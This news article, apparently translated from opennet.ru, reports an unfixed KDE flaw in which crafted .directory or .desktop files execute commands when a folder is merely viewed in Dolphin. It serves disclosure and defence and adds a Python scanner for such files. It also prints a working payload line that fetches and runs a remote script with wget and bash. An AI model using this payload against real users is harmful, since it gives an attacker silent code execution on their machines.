Vulnerability in KDE allowing code execution when viewing a list of files

A vulnerability has been identified in KDE that allows an attacker to execute arbitrary commands when a user browses a directory or archive containing specially crafted ".desktop" and ".directory" files. For an attack it is enough for the user to simply view the list of files in the Dolphin file manager, download a malicious desktop file, or drag a shortcut to the desktop or into a document with the mouse. The problem manifests itself in the current release of the KDE Frameworks libraries, 5.60.0, and in older versions back to KDE 4. The vulnerability remains unfixed (no CVE has been assigned).

The problem is caused by an incorrect implementation of the KDesktopFile class, which, when processing the "Icon" variable, passes its value without proper escaping to the KConfigPrivate::expandString() function, which expands shell special characters, including treating "$(..)" constructs as commands to be executed. Contrary to the requirements of the XDG specification, shell constructs are expanded without regard to the type of setting, i.e. not only when defining the command line of the application to be launched, but also when specifying the icons to be displayed by default.

For example, for an attack it is enough to send the user a zip archive with a directory containing a ".directory" file of the form:

[Desktop Entry]
Type=Directory
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

When the user tries to view the contents of the archive in the Dolphin file manager, the script https://example.com/FILENAME.sh will be downloaded and executed.
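The mechanism described above (a key carrying the KConfig "$e" expansion flag whose value contains a "$(..)" command substitution) can be checked for before an archive is opened in Dolphin. The following scanner is an added example for this article, not code from KDE or from the original report: it parses ".desktop" and ".directory" files in the INI-like desktop-entry format, extracts the bracketed flags after each key, and reports keys that request shell expansion, rating a finding "high" when the value also contains a "$(" or backtick command substitution. The sample files embedded below are constructed for the demonstration; the assumption that only keys flagged with "$e" are passed through expandString() follows the behaviour the article describes.

```python
"""Scan desktop-entry files for shell-expansion constructs (added example)."""
import os
import re
from typing import Dict, List

# One desktop-entry line: Key, zero or more [locale]/[$flags] brackets, '=', value.
KEY_RE = re.compile(r"^([A-Za-z0-9-]+)((?:\[[^\]]*\])*)=(.*)$")
GROUP_RE = re.compile(r"^\[(.+)\]$")
# Constructs that run a command once KConfig expands the value: $(...) or backticks.
COMMAND_SUBST_RE = re.compile(r"\$\(|`")
DESKTOP_SUFFIXES = (".desktop", ".directory")


def scan_desktop_entry(text: str, source: str = "<memory>") -> List[Dict[str, str]]:
    """Return one finding per key that carries the $e expansion flag."""
    findings: List[Dict[str, str]] = []
    group = ""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = GROUP_RE.match(line)
        if m:
            group = m.group(1)
            continue
        m = KEY_RE.match(line)
        if not m:
            continue  # not a key=value line; ignore
        key, brackets, value = m.groups()
        flags = re.findall(r"\[([^\]]*)\]", brackets)
        if not any("$e" in f for f in flags):
            continue  # no expansion requested; KConfig returns the value verbatim
        # Any $e-flagged key is worth a look; a command substitution inside it is the
        # pattern the article describes, so it is rated high regardless of the key name.
        severity = "high" if COMMAND_SUBST_RE.search(value) else "medium"
        findings.append({
            "source": source,
            "line": str(lineno),
            "group": group,
            "key": key,
            "severity": severity,
            "reason": ("command substitution inside $e-expanded value"
                       if severity == "high" else "key requests $e shell expansion"),
        })
    return findings


def is_suspicious(text: str) -> bool:
    """True when at least one high-severity finding is present."""
    return any(f["severity"] == "high" for f in scan_desktop_entry(text))


def scan_tree(root: str) -> List[Dict[str, str]]:
    """Walk an extracted archive or directory and scan every desktop-entry file."""
    findings: List[Dict[str, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(DESKTOP_SUFFIXES):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_desktop_entry(fh.read(), source=path))
    return findings


# Constructed samples: an ordinary folder entry and one shaped like the crafted file.
BENIGN = """[Desktop Entry]
Type=Directory
Icon=folder
Name[de]=Ordner
"""

CRAFTED = """[Desktop Entry]
Type=Directory
Icon[$e]=$(some-command)
"""

if __name__ == "__main__":
    for sample_name, sample in (("benign", BENIGN), ("crafted", CRAFTED)):
        for f in scan_desktop_entry(sample, source=sample_name):
            print(f"{f['source']}:{f['line']} [{f['group']}] {f['key']} "
                  f"{f['severity']}: {f['reason']}")
```

Run the module directly to scan the embedded samples, or call scan_tree() on the directory an archive was extracted into; a "high" finding on any key other than an intentionally scripted Exec line is the signature worth quarantining.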


Source: opennet.ru
